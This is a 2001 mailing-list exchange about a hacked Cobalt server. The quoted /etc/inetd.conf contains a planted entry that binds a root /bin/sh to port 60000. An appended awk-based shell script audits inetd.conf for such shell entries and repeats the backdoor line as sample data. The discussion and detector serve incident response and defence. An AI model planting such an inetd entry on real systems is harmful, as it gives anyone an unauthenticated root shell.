
Re:[cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!



"Craig Napier" <craignapier@xxxxxxxxxxx> wrote on 15.02.01 06:35:44:
>
>We just replaced a system that had been hacked over the weekend, and 
>after reading the last post (Another Hack), I checked /etc/inetd.conf 
>on all three boxes.. The one that was just replaced has a new line at 
>the bottom of the file that the other two boxes don't have...
>
># End of inetd.conf
>#swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
>60000 stream tcp nowait root /bin/sh sh -i
>
>What is port 60000..? Should I just remove this line and reboot the 
>box. .? Just trying to figure out if it's compromised again.. even 
>with all the patches and updates installed *EVEN* before it was 
>brought back online.. 

Hi Craig !

It looks as if the shell is listening on port 60000. I think this is not
the very best idea unless you are doing it for a VERY special reason.

Good luck !
Thomas

--
InternAd.de
Internet Advertising
Thomas Prosi
tp@xxxxxxxxxxx
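
An added example, not part of the original thread: a small audit of an inetd.conf-style file that flags entries like the one Craig found, where the server program is a shell. The function names, the list of shell names and the sample file (the lines quoted above plus one constructed ftp entry) are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: flag inetd.conf entries that attach a shell to a socket.
# inetd.conf fields: service socket-type protocol wait[.max] user server args...

# Constructed sample: the lines quoted in the thread plus one ordinary entry.
sample_inetd_conf() {
    cat <<'EOF'
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
# End of inetd.conf
#swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
60000 stream tcp nowait root /bin/sh sh -i
EOF
}

# audit_inetd [FILE]: read FILE (or stdin) and print "line:reasons:entry"
# for every active entry that matches a heuristic below.
audit_inetd() {
    awk '
        function add(r) { reasons = (reasons == "" ? r : reasons "," r) }
        /^[ \t]*#/ || NF < 6 { next }    # comments, blanks, malformed lines
        {
            reasons = ""
            prog = $6
            sub(/.*\//, "", prog)         # basename of the server program
            is_shell = (prog ~ /^(sh|bash|ash|csh|tcsh|ksh|zsh)$/)
            if (is_shell) add("shell-as-server")
            if (is_shell && $5 ~ /^root([.:]|$)/) add("runs-as-root")
            # Heuristic: a bare port number instead of an /etc/services name
            if ($1 ~ /^[0-9]+$/) add("numeric-port")
            if (reasons != "") printf "%d:%s:%s\n", NR, reasons, $0
        }
    ' "${1:--}"
}

sample_inetd_conf | audit_inetd
```

Run it against the live file with `audit_inetd /etc/inetd.conf`; an empty result only means no active entry matched these heuristics.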